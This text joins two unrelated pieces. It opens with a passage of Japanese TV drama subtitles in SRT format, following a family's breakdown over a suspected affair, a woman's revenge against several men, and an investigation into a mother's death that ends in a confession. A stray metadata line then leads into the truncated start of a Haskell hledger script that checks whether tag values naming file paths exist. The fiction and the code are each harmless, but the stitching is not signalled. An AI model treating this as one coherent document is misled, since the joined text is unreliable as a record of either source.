♬~
76
00:06:32,871 --> 00:06:52,891
♬~
77
00:06:52,891 --> 00:06:55,260
♬~
78
00:06:55,260 --> 00:06:57,212
(和繁)「風邪 大丈夫ですか?➡
79
00:06:57,212 --> 00:07:00,015
指輪は
オレからのサプライズです。➡
80
00:07:00,015 --> 00:07:04,115
早く元気になってください。
和繁」。
81
00:07:13,195 --> 00:07:15,395
(良太)あの 何か?
82
00:07:17,966 --> 00:07:21,753
(堀江)あら? 和繁君じゃない。
(良太)誰?
83
00:07:21,753 --> 00:07:25,007
(依里)理事長の息子さん。
(良太)へぇ~。
84
00:07:25,007 --> 00:07:27,707
(堀江)理事長なら お部屋に…。
(和繁)サキさんは?
85
00:07:30,545 --> 00:07:32,145
どうしたの?
86
00:07:36,184 --> 00:07:40,105
俺 見たんです。
87
00:07:40,105 --> 00:07:42,605
見た? 何を?
88
00:07:47,045 --> 00:07:52,145
(和繁)
おやじを サキさんのマンションで。
89
00:07:54,169 --> 00:07:59,569
それが どういうことなのか
ずっと考えてて…。
90
00:08:02,994 --> 00:08:09,885
風邪をひいてるって言ったら
いろいろ届けてくださるって。
91
00:08:09,885 --> 00:08:15,540
えっ?
やっぱり理事長は上司だし➡
92
00:08:15,540 --> 00:08:21,179
ありがとうございますって
言ったほうが いいのかなと思って。
93
00:08:21,179 --> 00:08:23,949
そんな…。
94
00:08:23,949 --> 00:08:30,272
あっ あなたがチャイムを
押してたとき➡
95
00:08:30,272 --> 00:08:35,172
お父さんも見てたのよ。
リビングのモニターから。
96
00:08:39,247 --> 00:08:42,601
⦅ちょ… ちょっと。⦆
97
00:08:42,601 --> 00:08:44,753
⦅ちょっと…。⦆
98
00:08:44,753 --> 00:08:48,153
私 そのとき 思ったんだけど…。
99
00:08:53,945 --> 00:08:55,614
ううん。
100
00:08:55,614 --> 00:08:57,282
サキさん!
101
00:08:57,282 --> 00:09:05,674
♬~
102
00:09:05,674 --> 00:09:11,613
ふだんは 病院の理事長として
きぜんとしているし➡
103
00:09:11,613 --> 00:09:17,913
いい夫 いい父親なのに
やっぱり…。
104
00:09:20,071 --> 00:09:22,757
男なんだなぁって。
105
00:09:22,757 --> 00:09:30,081
♬~
106
00:09:30,081 --> 00:09:39,574
つまり 理事長にとって私は
息子の相手じゃなくて➡
107
00:09:39,574 --> 00:09:43,111
そういう目で見られてた
ってことになるんだけど…。
108
00:09:43,111 --> 00:09:51,203
♬~
109
00:09:51,203 --> 00:09:57,776
でも 今思うと
思い当たることもあるかも。
110
00:09:57,776 --> 00:09:59,376
何?
111
00:10:02,547 --> 00:10:05,033
ひげ。
112
00:10:05,033 --> 00:10:06,633
えっ?
113
00:10:10,172 --> 00:10:14,509
おひげ ないほうが すてきかも
って言ったら➡
114
00:10:14,509 --> 00:10:16,909
翌日 そってた。
115
00:10:20,782 --> 00:10:26,482
お父さん 私の部屋にまで来て
言いたかったことはね…。
116
00:10:29,241 --> 00:10:31,109
あなたとの縁を➡
117
00:10:31,109 --> 00:10:34,009
切ってほしいってことだったわ。
118
00:10:35,747 --> 00:10:37,415
父さんが…。
119
00:10:37,415 --> 00:10:39,284
≪野村弁護士との関係ですか?
120
00:10:39,284 --> 00:10:41,987
(岩城)
ええ。 新田明美さんといいます。
121
00:10:41,987 --> 00:10:46,541
亡くなるまで 新田金属工業という
部品工場を経営していたんです。
122
00:10:46,541 --> 00:10:50,745
新田金属工業…。
123
00:10:50,745 --> 00:10:53,031
クライアントでは
ありませんね。➡
124
00:10:53,031 --> 00:10:56,284
私も その方を存じあげませんし
聞いたことありません。
125
00:10:56,284 --> 00:10:58,153
そうですか…。
126
00:10:58,153 --> 00:11:02,958
では 日整空調管理という
会社名は?
127
00:11:02,958 --> 00:11:07,045
いえ。
ITゲートという会社名は?
128
00:11:07,045 --> 00:11:09,547
いえ。
あぁ~。
129
00:11:09,547 --> 00:11:13,518
個人名では どうですかね?
こちらが中川肇さん➡
130
00:11:13,518 --> 00:11:17,205
こちらが
本田典史さんっていうんです。
131
00:11:17,205 --> 00:11:19,641
野村先生は ここ数年➡
132
00:11:19,641 --> 00:11:23,712
個人の案件を
受けたことがないと思うんですが。
133
00:11:23,712 --> 00:11:26,081
≪新田さん…。➡
134
00:11:26,081 --> 00:11:29,751
いや 中川社長からは
聞いたことありませんね。
135
00:11:29,751 --> 00:11:31,403
(梨沙)私もないです。
136
00:11:31,403 --> 00:11:35,407
新田金属工業も
日整空調管理も➡
137
00:11:35,407 --> 00:11:39,711
浦ヶ浜法律事務所も
聞いたことはないんですよね?
138
00:11:39,711 --> 00:11:41,311
ええ。
139
00:11:43,131 --> 00:11:46,184
じゃあ こちらの方々は?
140
00:11:46,184 --> 00:11:50,755
(道子)聞いたことないし
うちの取引先ではないです。
141
00:11:50,755 --> 00:11:52,407
そうですか。
142
00:11:52,407 --> 00:11:57,078
あっ これ 頼まれていた
本田さんの業務日誌のコピーです。
143
00:11:57,078 --> 00:11:59,878
ありがとうございます。
お借りします。
144
00:12:02,500 --> 00:12:04,636
(須藤)おいしそうなスープだね。
145
00:12:04,636 --> 00:12:08,256
今日は
豆乳野菜スープなの。
146
00:12:08,256 --> 00:12:11,643
あぁ へぇ~。
147
00:12:11,643 --> 00:12:13,543
(恵)和君 おかえりなさい。
148
00:12:15,246 --> 00:12:16,846
はぁ~!
149
00:12:19,601 --> 00:12:21,753
どういうことだよ?
150
00:12:21,753 --> 00:12:24,856
(恵)あなた 大丈夫?
151
00:12:24,856 --> 00:12:26,958
ああ。
152
00:12:26,958 --> 00:12:31,563
和君。 お父さんに 何てことを…
どうしちゃったの?
153
00:12:31,563 --> 00:12:37,402
俺 出てくから こんな家。
154
00:12:37,402 --> 00:12:40,755
えっ?
(和繁)昨日の夜➡
155
00:12:40,755 --> 00:12:44,655
おやじ
サキさんの家に行ってたよ。
156
00:12:48,680 --> 00:12:50,480
俺 見たんだ。
157
00:12:54,753 --> 00:12:57,889
誤解だ。 違う。
158
00:12:57,889 --> 00:12:59,607
何が違うんだよ 違わないだろ?
159
00:12:59,607 --> 00:13:04,679
(須藤)違う 違う 理由があるんだ。
やましい気持ちなんてない。
160
00:13:04,679 --> 00:13:07,682
理由?
ああ。
161
00:13:07,682 --> 00:13:10,518
俺と縁を切れって言いに?➡
162
00:13:10,518 --> 00:13:13,918
わざわざ
家に上がり込んだっていうのか?
163
00:13:15,523 --> 00:13:19,361
俺をだしにしたんだろ?
164
00:13:19,361 --> 00:13:21,961
自分がサキさんを好きだからって。
165
00:13:23,698 --> 00:13:27,118
えっ?
普通 息子をだしになんてするか?
166
00:13:27,118 --> 00:13:28,887
いくら
2人っきりになりたいからって。
167
00:13:28,887 --> 00:13:31,156
何をばかなことを!
(恵)あなた どういうことなの?
168
00:13:31,156 --> 00:13:35,076
(須藤)違う 違うんだよ。
169
00:13:35,076 --> 00:13:37,112
誤解されるようなこと
言うんじゃねぇよ!
170
00:13:37,112 --> 00:13:38,780
じゃあ
何で隠してたんだよ?
171
00:13:38,780 --> 00:13:43,735
(須藤)だから こうやって
誤解させたら困ると思ったんだよ。
172
00:13:43,735 --> 00:13:48,873
誤解?
まっとうな理由だったら➡
173
00:13:48,873 --> 00:13:55,173
俺に言えなくても
母さんには言えるよな?
174
00:14:01,986 --> 00:14:06,386
あのイヤリングも
サキさんのなの?
175
00:14:09,394 --> 00:14:13,131
はめられたんだ。
はめられた?
176
00:14:13,131 --> 00:14:16,651
(須藤)全部
あいつが仕組んだ わななんだ。➡
177
00:14:16,651 --> 00:14:18,503
あいつは
うちを壊そうとしてるんだよ。
178
00:14:18,503 --> 00:14:20,572
うちを壊して 何の得があるの?
179
00:14:20,572 --> 00:14:24,742
サキさんに
どんな理由があるっていうの?➡
180
00:14:24,742 --> 00:14:30,432
サキさんは 和繁が…➡
181
00:14:30,432 --> 00:14:32,884
あなたの息子が
好きになった人なのよ?
182
00:14:32,884 --> 00:14:34,784
わかってるの?
183
00:14:36,488 --> 00:14:40,191
サキさん言ってたよ。
184
00:14:40,191 --> 00:14:44,813
ふだんは 病院の理事長として
きぜんとしてても➡
185
00:14:44,813 --> 00:14:50,552
いい夫 いい父親でも
やっぱり…➡
186
00:14:50,552 --> 00:14:53,252
ただの男なんだなぁって。
187
00:14:55,056 --> 00:14:58,056
そういう目で
私を見てたんだってね。
188
00:15:00,645 --> 00:15:02,245
あなた…。
189
00:15:06,284 --> 00:15:11,422
信じてくれ… 俺を。➡
190
00:15:11,422 --> 00:15:13,022
なぁ。
191
00:15:15,143 --> 00:15:19,214
恵 なぁ。 恵。
192
00:15:19,214 --> 00:15:23,914
(和繁)ひげそったのも サキさんが
言ったからなんだってな。
193
00:15:26,221 --> 00:15:29,174
ひげがないほうがいい
って言われて➡
194
00:15:29,174 --> 00:15:31,559
すぐに そったらしいじゃないか。
195
00:15:31,559 --> 00:15:33,461
そんなこと…。
196
00:15:33,461 --> 00:15:39,367
♬~
197
00:15:39,367 --> 00:15:41,069
恵!
198
00:15:41,069 --> 00:15:42,820
恵!
199
00:15:42,820 --> 00:15:44,420
さよなら。
200
00:15:47,992 --> 00:15:52,547
ピンポーン ピンポーン…
201
00:15:52,547 --> 00:15:56,467
ピンポーン ピンポーン…
202
00:15:56,467 --> 00:15:59,020
ピンポン!ピンポン!ピンポン…
203
00:15:59,020 --> 00:16:00,672
開けなさいよ。
204
00:16:00,672 --> 00:16:03,208
ピンポン!ピンポン!ピンポン…
205
00:16:03,208 --> 00:16:06,394
開けなさい!!
206
00:16:06,394 --> 00:16:07,994
ピー(解錠の音)
207
00:16:09,864 --> 00:16:13,864
208
00:16:15,887 --> 00:16:28,687
209
00:17:30,878 --> 00:17:36,668
210
00:17:36,668 --> 00:17:39,068
ピンポーン!
211
00:17:57,889 --> 00:17:59,791
212
00:17:59,791 --> 00:18:01,391
恵さん。
213
00:18:07,949 --> 00:18:09,749
うそつき。
214
00:18:12,020 --> 00:18:14,305
信じてたのに。
215
00:18:14,305 --> 00:18:19,877
♬~
216
00:18:19,877 --> 00:18:21,546
うっ…。
217
00:18:21,546 --> 00:18:26,534
何で… どうして私をだましたの?
218
00:18:26,534 --> 00:18:30,234
あのパールのイヤリングだって
あなたのなんでしょ?
219
00:18:32,056 --> 00:18:37,256
許せない… 絶対に許さない。
220
00:18:39,797 --> 00:18:42,097
いった~。
221
00:18:43,851 --> 00:18:48,322
はぁはぁ はぁ…。
222
00:18:48,322 --> 00:18:49,922
何なの?
223
00:18:53,494 --> 00:18:55,813
あなたが悪いんじゃない!
224
00:18:55,813 --> 00:19:14,882
♬~
225
00:19:14,882 --> 00:19:23,141
♬~
226
00:19:23,141 --> 00:19:25,676
結婚していても➡
227
00:19:25,676 --> 00:19:28,880
誰かに ときめくことや
愛してしまうことは止められない。
228
00:19:28,880 --> 00:19:30,598
そう言ったでしょう?
229
00:19:30,598 --> 00:19:36,938
♬~
230
00:19:36,938 --> 00:19:40,608
因果応報とでも言いたいわけ?
231
00:19:40,608 --> 00:19:46,108
私は 絶対 渡さないわよ。
必ず奪い返してみせる。
232
00:19:48,483 --> 00:19:52,483
はぁ… ははっ。
233
00:19:55,907 --> 00:19:59,544
何 笑ってんの?
234
00:19:59,544 --> 00:20:02,544
生き生きしてるなぁと思って。
235
00:20:05,383 --> 00:20:07,835
勘違いしないで。
236
00:20:07,835 --> 00:20:12,657
私 ご主人のことなんて
何とも思ってないから。
237
00:20:12,657 --> 00:20:14,257
えっ?
238
00:20:15,993 --> 00:20:21,493
じゃあ
し… 主人のほうが一方的に?
239
00:20:25,470 --> 00:20:27,070
恵さん。
240
00:20:31,292 --> 00:20:35,179
そういう本当のあなたに
戻ればいいのよ。
241
00:20:35,179 --> 00:20:43,254
♬~
242
00:20:43,254 --> 00:20:45,054
思い出して。
243
00:20:49,076 --> 00:20:53,576
あなたを
幸せにすることができるのは 誰?
244
00:20:58,019 --> 00:21:00,588
何が一番の幸せ?
245
00:21:00,588 --> 00:21:06,894
♬~
246
00:21:06,894 --> 00:21:09,294
よ~く考えて。
247
00:21:13,267 --> 00:21:15,867
あなたなら わかるでしょ?
248
00:21:17,955 --> 00:21:20,855
自分自身の人生なんだから。
249
00:21:25,746 --> 00:21:30,084
(岩城)3人と新田のお母さんの接点
なかなか見つかりませんね。
250
00:21:30,084 --> 00:21:32,570
(直美)2007年の2月28日➡
251
00:21:32,570 --> 00:21:35,323
中川さんは
契約先の企業回りをしていた。➡
252
00:21:35,323 --> 00:21:37,825
13時に
渋谷区にあるグランソフト社➡
253
00:21:37,825 --> 00:21:40,261
15時に
品川区の 桑栄社でしょ?➡
254
00:21:40,261 --> 00:21:43,214
で 18時に
代官山のレストランで会食。➡
255
00:21:43,214 --> 00:21:46,200
多分 タクシーか自家用車で
移動してるはずだって。
256
00:21:46,200 --> 00:21:48,553
本田は空調修理の現場にいました。
257
00:21:48,553 --> 00:21:51,205
現場は
品川区 大山 三元第1ビル。
258
00:21:51,205 --> 00:21:53,274
会社から自転車で向かっています。
259
00:21:53,274 --> 00:21:54,959
野村先生は?
260
00:21:54,959 --> 00:21:56,677
その日は
何か 休みだったようです。
261
00:21:56,677 --> 00:21:59,680
休み。 何してたって?
262
00:21:59,680 --> 00:22:01,866
わかんないんですよ。
6年も前だし➡
263
00:22:01,866 --> 00:22:04,418
行動をつかむのに
時間かかるかもしれません。
264
00:22:04,418 --> 00:22:08,055
そうだよね。 引き続き調べてみて。
265
00:22:08,055 --> 00:22:09,655
はい。
はい。
266
00:23:42,867 --> 00:23:57,698
267
00:23:57,698 --> 00:24:00,298
恵さん 食べましょ。
268
00:24:07,341 --> 00:24:09,041
恵さん?
269
00:24:15,966 --> 00:24:18,366
いただきます。
270
00:24:31,982 --> 00:24:35,682
おかしな話かもしれないけど…。
271
00:24:37,705 --> 00:24:42,510
やっぱり私は…➡
272
00:24:42,510 --> 00:24:49,410
あなたに出会えて良かったって
思ってる。
273
00:24:51,352 --> 00:24:53,054
恵さん。
274
00:24:53,054 --> 00:25:02,947
♬~
275
00:25:02,947 --> 00:25:05,800
気持ち悪くなっちゃった。
276
00:25:05,800 --> 00:25:07,551
えっ?
277
00:25:07,551 --> 00:25:09,751
あの人のこと。
278
00:25:11,756 --> 00:25:15,356
このドレッシング
すっごくおいしいわ。
279
00:25:18,079 --> 00:25:20,414
ふふっ。
ふふふっ。
280
00:25:20,414 --> 00:25:39,867
♬~
281
00:25:39,867 --> 00:25:48,967
♬~
282
00:26:00,871 --> 00:26:19,557
283
00:26:19,557 --> 00:26:23,157
ふぅ~…。
284
00:26:42,880 --> 00:27:02,867
285
00:27:02,867 --> 00:27:05,603
286
00:27:05,603 --> 00:27:24,503
♬~
287
00:27:27,107 --> 00:27:28,776
≫へい お待ち~!
288
00:27:28,776 --> 00:27:30,461
(直美・岩城)
ありがとうございます!
289
00:27:30,461 --> 00:27:35,549
(岩城)なあ 新田のお母さんってさ
どんなお母さんだったの?
290
00:27:35,549 --> 00:27:37,518
えっ?
ふふふっ。
291
00:27:37,518 --> 00:27:40,804
いや 多分…。
うん。
292
00:27:40,804 --> 00:27:45,059
どこにでもいる あの
普通の優しい母さん。
293
00:27:45,059 --> 00:27:47,595
(直美・岩城)はははっ…。
(直美)何となく そんな気はする➡
294
00:27:47,595 --> 00:27:49,313
新田 見てるとね。
うんうん。
295
00:27:49,313 --> 00:27:51,498
えっ?
296
00:27:51,498 --> 00:27:57,805
あっ 母さん
庭で花を育ててたんです。
297
00:27:57,805 --> 00:27:59,556
どんな花?
298
00:27:59,556 --> 00:28:04,561
白い花で ダイヤモンドリリーって
いうらしいんですけど。
299
00:28:04,561 --> 00:28:07,982
秋になると
庭に たくさん咲いて➡
300
00:28:07,982 --> 00:28:09,800
毎日 手入れしてました。
301
00:28:09,800 --> 00:28:13,554
へぇ~。
それで この間 調べてたら➡
302
00:28:13,554 --> 00:28:19,354
花言葉が出てきたんです。
花言葉? 何だったの?
303
00:28:21,612 --> 00:28:24,565
また会う日を楽しみに。
304
00:28:24,565 --> 00:28:32,523
♬~
305
00:28:32,523 --> 00:28:36,043
きっと 姉ちゃんのこと
思ってたんだなって…。
306
00:28:36,043 --> 00:28:39,747
俺には 何も言わなかったけど➡
307
00:28:39,747 --> 00:28:43,917
多分
会いたかったんじゃないかなって。
308
00:28:43,917 --> 00:28:49,523
♬~
309
00:28:49,523 --> 00:28:51,892
会ったんじゃないかな?
310
00:28:51,892 --> 00:28:56,692
えっ?
サキさん 現場にいたのかも。
311
00:28:59,016 --> 00:29:02,516
(直美)だから 殺されたって
言ったんじゃないのかな。
312
00:29:04,605 --> 00:29:06,605
⦅救急車 呼んでください!⦆
313
00:29:08,392 --> 00:29:10,294
念のために聞いておくけど➡
314
00:29:10,294 --> 00:29:16,467
新田は何してた?
2007年の2月28日。
315
00:29:16,467 --> 00:29:21,005
俺は… バイト先で連絡受けて。
316
00:29:21,005 --> 00:29:25,592
そう…。 明日 もう一度➡
317
00:29:25,592 --> 00:29:29,279
新田のお母さんが搬送された
病院に行って 確認してみよう。
318
00:29:29,279 --> 00:29:30,931
はい。
はい。
319
00:29:30,931 --> 00:29:50,884
♬~
320
00:29:50,884 --> 00:29:56,284
♬~
321
00:29:59,043 --> 00:30:02,443
(店員)89年って
何かの記念日なんですか?
322
00:30:04,131 --> 00:30:09,169
ええ。
あるご家族が生まれた日なの。
323
00:30:09,169 --> 00:30:12,556
そうなんですか。
そのご夫婦➡
324
00:30:12,556 --> 00:30:16,610
そのときに
新しい命を授かっていてね➡
325
00:30:16,610 --> 00:30:22,349
だから そのご夫婦と子供
家族3人のお祝い。
326
00:30:22,349 --> 00:30:25,652
すてきですね。
ふふっ。
327
00:30:25,652 --> 00:30:29,523
じゃあ もう1本のビンテージは?
328
00:30:29,523 --> 00:30:32,123
その年はね…。
(和繁)サキさん!
329
00:30:36,180 --> 00:30:40,567
こんにちは。
来てくれたんですか!
330
00:30:40,567 --> 00:30:43,754
この間 頼んだワインを
受け取りにきたの。
331
00:30:43,754 --> 00:30:45,889
♬~(店内のBGM)
332
00:30:45,889 --> 00:30:50,894
♬~
333
00:30:50,894 --> 00:30:52,494
(和繁)サキさん!
334
00:30:56,350 --> 00:30:59,550
俺 家を出ました。
335
00:31:01,271 --> 00:31:03,671
おやじとも縁を切ります。
336
00:31:06,343 --> 00:31:14,351
だから… もう何も
気にしなくていいんです!
337
00:31:14,351 --> 00:31:17,087
和繁君。
338
00:31:17,087 --> 00:31:21,925
俺と もう一度 ちゃんと
やり直してもらえませんか?
339
00:31:21,925 --> 00:31:31,802
♬~
340
00:31:31,802 --> 00:31:39,359
恵さんがね
いつも あなたのことを褒めてた。
341
00:31:39,359 --> 00:31:44,959
和君は
優しくて 素直で いい子だって。
342
00:31:47,334 --> 00:31:52,434
でもね 私に言わせると…。
343
00:31:54,958 --> 00:31:57,127
ただのばかなのよ。
344
00:31:57,127 --> 00:32:14,661
♬~
345
00:32:14,661 --> 00:32:16,313
はい。
346
00:32:16,313 --> 00:32:35,883
♬~
347
00:32:35,883 --> 00:32:38,483
♬~
348
00:34:12,312 --> 00:34:16,016
(医師)新田明美さん。
(岩城)運ばれたときに➡
349
00:34:16,016 --> 00:34:19,002
女性が一緒だったかどうか
わかりますか?
350
00:34:19,002 --> 00:34:23,090
いえ 記録が
残ってないので何とも…。
351
00:34:23,090 --> 00:34:26,310
あぁ~ そうですか。
352
00:34:26,310 --> 00:34:33,050
あの 当時 死因は
急性心不全だと聞いたのですが。
353
00:34:33,050 --> 00:34:39,056
ええ。 新田さんは もともと
心室中隔欠損症という➡
354
00:34:39,056 --> 00:34:42,492
先天性の心臓の病気を
抱えていたらしいですね。
355
00:34:42,492 --> 00:34:44,161
はい。
(医師)そういった方は➡
356
00:34:44,161 --> 00:34:46,980
心不全を来しやすいというか。
357
00:34:46,980 --> 00:34:51,218
じゃあ やっぱり
死因に不審な点は ないんですね。
358
00:34:51,218 --> 00:34:55,706
ええ。 結果的に死を早めた原因も
ないと思いますよ。
359
00:34:55,706 --> 00:34:58,492
過去に大きな手術でも
していないかぎりは。
360
00:34:58,492 --> 00:35:04,164
♬~
361
00:35:04,164 --> 00:35:07,300
死因に不審な点はない。
362
00:35:07,300 --> 00:35:09,369
それなのに殺されたって➡
363
00:35:09,369 --> 00:35:14,141
一体
どういうことなんだろうなぁ。
364
00:35:14,141 --> 00:35:15,741
ん? どうした?
365
00:35:17,477 --> 00:35:20,731
ごめん 俺 ちょっと…。
366
00:35:20,731 --> 00:35:23,231
先 帰ってて。 すぐ戻る。
367
00:35:27,154 --> 00:35:30,657
(医師)⦅結果的に死を早めた原因も
ないと思いますよ。➡⦆
368
00:35:30,657 --> 00:35:33,310
⦅過去に大きな手術でも
していないかぎりは。⦆
369
00:35:33,310 --> 00:35:52,879
♬~
370
00:35:52,879 --> 00:36:01,555
♬~
371
00:36:01,555 --> 00:36:03,423
すいません お忙しいところ。
372
00:36:03,423 --> 00:36:06,743
(祐樹)いえ ちょうど今夜
島根に帰るところだったんです。
373
00:36:06,743 --> 00:36:08,562
そうでしたか。
374
00:36:08,562 --> 00:36:27,864
♬~
375
00:36:27,864 --> 00:36:47,884
♬~
376
00:36:47,884 --> 00:36:49,936
♬~
377
00:36:49,936 --> 00:36:54,708
2007年2月28日は➡
378
00:36:54,708 --> 00:36:56,426
兄と一緒でした。
379
00:36:56,426 --> 00:37:00,826
えっ?
私の結婚式だったんです。
380
00:37:03,683 --> 00:37:06,603
野村先生は
出席されたんですよね?
381
00:37:06,603 --> 00:37:11,625
はい。 あっ だけど…
遅れてきたんです。
382
00:37:11,625 --> 00:37:14,425
遅れて?
ええ。
383
00:37:19,583 --> 00:37:22,252
どうして遅れたんですか?
384
00:37:22,252 --> 00:37:26,756
確か 家で
仕事をしなきゃならないとか➡
385
00:37:26,756 --> 00:37:29,192
うん そんな理由だったような気が
します。
386
00:37:29,192 --> 00:37:30,894
♬~(店内のBGM)
387
00:37:30,894 --> 00:37:35,499
♬~
388
00:37:35,499 --> 00:37:39,499
これ 兄の家から
持ってきたんです。
389
00:37:44,007 --> 00:37:49,012
(祐樹)離婚するのに こんな写真
持ってるのも おかしいんですけど。
390
00:37:49,012 --> 00:37:51,812
兄と撮った最後の写真だから。
391
00:37:55,585 --> 00:37:58,705
(祐樹)大人になってから
一緒に写真を撮ることなんて➡
392
00:37:58,705 --> 00:38:01,141
なかったんです。
393
00:38:01,141 --> 00:38:05,045
いい写真ですね。
ありがとうございます。
394
00:38:05,045 --> 00:38:11,852
♬~
395
00:38:11,852 --> 00:38:16,356
そういえば サキさんにも…。
サキさん?
396
00:38:16,356 --> 00:38:18,542
同じこと 聞かれたな。
397
00:38:18,542 --> 00:38:22,078
⦅野村さん
結婚式 遅れてきたの?⦆
398
00:38:22,078 --> 00:38:24,878
⦅どうして 遅れたんだろう?⦆
399
00:38:27,067 --> 00:38:30,036
[TEL](留守番電話のアナウンス)
メッセージをお預かりしました。
400
00:38:30,036 --> 00:38:46,887
♬~
401
00:38:46,887 --> 00:38:50,907
≪ピーポー ピーポー…(サイレンの音)
402
00:38:50,907 --> 00:38:53,107
ピーポー ピーポー…
403
00:38:55,879 --> 00:38:58,879
404
00:40:30,874 --> 00:40:48,208
405
00:40:48,208 --> 00:40:51,978
(直美)新田のお母さんが
倒れたのは 品川区。
406
00:40:51,978 --> 00:40:54,347
(岩城)
赤が中川さん 青が本田さん。➡
407
00:40:54,347 --> 00:40:56,966
野村先生の行動は黄色で引きます。
408
00:40:56,966 --> 00:41:02,439
(直美)野村先生は自宅から
品川区橋本町にある結婚式場に➡
409
00:41:02,439 --> 00:41:04,908
自家用車で向かった。➡
410
00:41:04,908 --> 00:41:10,346
結婚式は午後2時からだったのに
1時間遅れて到着した。
411
00:41:10,346 --> 00:41:15,552
午後3時ごろ 3人共
同じ品川区にいた。
412
00:41:15,552 --> 00:41:17,303
近いよね。
413
00:41:17,303 --> 00:41:19,789
これって
どういうことなんだろう…。
414
00:41:19,789 --> 00:41:24,044
直美さん 母さんが倒れた場所
行ってきました。
415
00:41:24,044 --> 00:41:26,546
思ったんですけど
あそこで倒れたら 普通は➡
416
00:41:26,546 --> 00:41:29,349
港南総合病院に運ばれますよね?
417
00:41:29,349 --> 00:41:32,049
じゃあ 何で港区の病院に
運ばれたんだろうって。
418
00:41:33,887 --> 00:41:37,057
(直美)港区の病院…。
419
00:41:37,057 --> 00:41:39,159
港南総合病院…。
420
00:41:39,159 --> 00:41:40,759
ぶっ!
421
00:41:58,878 --> 00:42:07,303
422
00:42:07,303 --> 00:42:19,883
♬~
423
00:42:19,883 --> 00:42:21,634
⦅はぁ~。⦆
424
00:42:21,634 --> 00:42:24,220
(恵)⦅うん 大丈夫。⦆
425
00:42:24,220 --> 00:42:27,874
⦅薄味も
きっと そのうち慣れるわよ。⦆
426
00:42:27,874 --> 00:42:30,710
⦅そうかな?⦆
⦅健康のためなんだから➡
427
00:42:30,710 --> 00:42:32,610
私も工夫するわ。⦆
428
00:42:34,614 --> 00:42:37,700
⦅ただいま。⦆
⦅おぉ おかえり 和繁。⦆
429
00:42:37,700 --> 00:42:40,303
(和繁)
⦅ねえ 父さん 週末 テニス行く?⦆
430
00:42:40,303 --> 00:42:43,823
⦅おう。⦆
(恵)⦅あぁ~ 私も~!⦆
431
00:42:43,823 --> 00:42:45,475
(須藤)⦅はい はい。 はははっ。⦆
432
00:42:45,475 --> 00:42:47,177
(和繁)⦅母さんも
もう若くないんだから➡
433
00:42:47,177 --> 00:42:50,480
あんまり無理しないでよ。⦆
⦅ひと言 余計です。⦆
434
00:42:50,480 --> 00:42:53,316
(一同)⦅ははははっ…。⦆
435
00:42:53,316 --> 00:43:02,316
♬~
436
00:43:21,878 --> 00:43:27,217
437
00:43:27,217 --> 00:43:35,175
♬~
438
00:43:35,175 --> 00:43:38,494
(直美)サキさんて
中川さんが退院したあとに➡
439
00:43:38,494 --> 00:43:40,713
港南総合病院に移ってるんだよね。
440
00:43:40,713 --> 00:43:45,718
はい。 姉ちゃん 母さんが5人の
男に殺されたっていうことを➡
441
00:43:45,718 --> 00:43:48,221
港南総合病院の理事長に
話したみたいなんです。
442
00:43:48,221 --> 00:43:53,293
えっ? 何で そんなわざわざ
自分の首を絞めるようなこと。
443
00:43:53,293 --> 00:43:55,945
あえて そう言ったってこと?
444
00:43:55,945 --> 00:43:58,448
それって…。
445
00:43:58,448 --> 00:44:00,648
宣戦布告。
446
00:44:02,418 --> 00:44:05,355
その理事長
4人目のターゲットかも。
447
00:44:05,355 --> 00:44:24,874
♬~
448
00:44:24,874 --> 00:44:36,119
♬~
449
00:44:36,119 --> 00:44:37,787
う~ん!
450
00:44:37,787 --> 00:44:56,889
♬~
451
00:44:56,889 --> 00:45:16,876
♬~
452
00:45:16,876 --> 00:45:22,365
♬~
453
00:45:22,365 --> 00:45:24,600
ぶっ!
454
00:45:24,600 --> 00:45:27,270
ぶっ!
455
00:45:27,270 --> 00:45:29,072
ぶぅ~~!
456
00:45:29,072 --> 00:45:48,891
♬~
457
00:45:48,891 --> 00:46:08,878
♬~
458
00:46:08,878 --> 00:46:20,089
♬~
459
00:46:20,089 --> 00:46:21,741
ぶぅ~~!
460
00:46:21,741 --> 00:46:40,877
♬~
461
00:46:40,877 --> 00:46:47,377
♬~
462
00:47:05,201 --> 00:47:24,887
♬~
463
00:47:24,887 --> 00:47:44,874
♬~
464
00:47:44,874 --> 00:48:04,894
♬~
465
00:48:04,894 --> 00:48:24,881
♬~
466
00:48:24,881 --> 00:48:44,867
♬~
467
00:48:44,867 --> 00:49:04,887
♬~
468
00:49:04,887 --> 00:49:24,874
♬~
469
00:49:24,874 --> 00:49:34,274
♬~
470
00:49:49,098 --> 00:49:52,602
[TEL](留守番電話のアナウンス)
最初の新しいメッセージです。
471
00:49:52,602 --> 00:49:54,270
[TEL](留守番電話)姉ちゃん…。
472
00:49:54,270 --> 00:49:56,272
♬「Catch Me -If you wanna-」
473
00:49:56,272 --> 00:50:12,355
♬~
474
00:50:12,355 --> 00:50:16,592
姉ちゃんは… 知ってたんだね…。
475
00:50:16,592 --> 00:50:29,088
♬~
476
00:50:29,088 --> 00:50:33,843
♬~
477
00:50:33,843 --> 00:50:38,114
俺が… 母さんを…。
478
00:50:38,114 --> 00:50:57,867
♬~
479
00:50:57,867 --> 00:51:02,588
♬~
480
00:51:02,588 --> 00:51:04,388
母さんを…。
481
00:51:08,244 --> 00:51:09,979
殺したことを…。
482
00:51:09,979 --> 00:51:29,882
♬~
483
00:51:29,882 --> 00:51:34,904
♬~
484
00:51:34,904 --> 00:51:42,978
♬~
485
00:51:42,978 --> 00:51:44,814
(直美)あと1人 残ってる。
486
00:51:44,814 --> 00:51:47,383
(岩城)野村先生 中川さん 本田…。
487
00:51:47,383 --> 00:51:49,885
何かがあった…。
絶対に教えない。
488
00:51:49,885 --> 00:51:52,121
俺は姉ちゃんの大事な人を奪った。
489
00:51:52,121 --> 00:51:55,821
このワインね
どちらかを飲むと 死ぬの。
490
00:51:57,877 --> 00:52:10,677
491
00:52:12,892 --> 00:52:15,092
お母さんへ。
姉ちゃん!
| {
"pile_set_name": "Github"
} |
#!/usr/bin/env stack
-- stack script --compile --resolver lts-16.3
{-
hledger-check-tag-files stack script.
Read the default journal and give an error if any tag values
containing '/' do not exist as file paths.
Usage:
$ hledger-check-tag-files.hs # compiles if needed
or:
$ hledger check-tag-files # compiles if there's no compiled version
-}
import Control.Monad
import qualified Data.Text as T
import Hledger.Cli
import System.Directory
import System.Exit
main = withJournalDo defcliopts $ \j -> do
let filetags = [ (t,v)
| (t',v') <- concatMap transactionAllTags $ jtxns j
, let t = T.unpack t'
, let v = T.unpack v'
, '/' `elem` v
]
forM_ filetags $ \(t,f) -> do
exists <- doesFileExist f
when (not exists) $ do
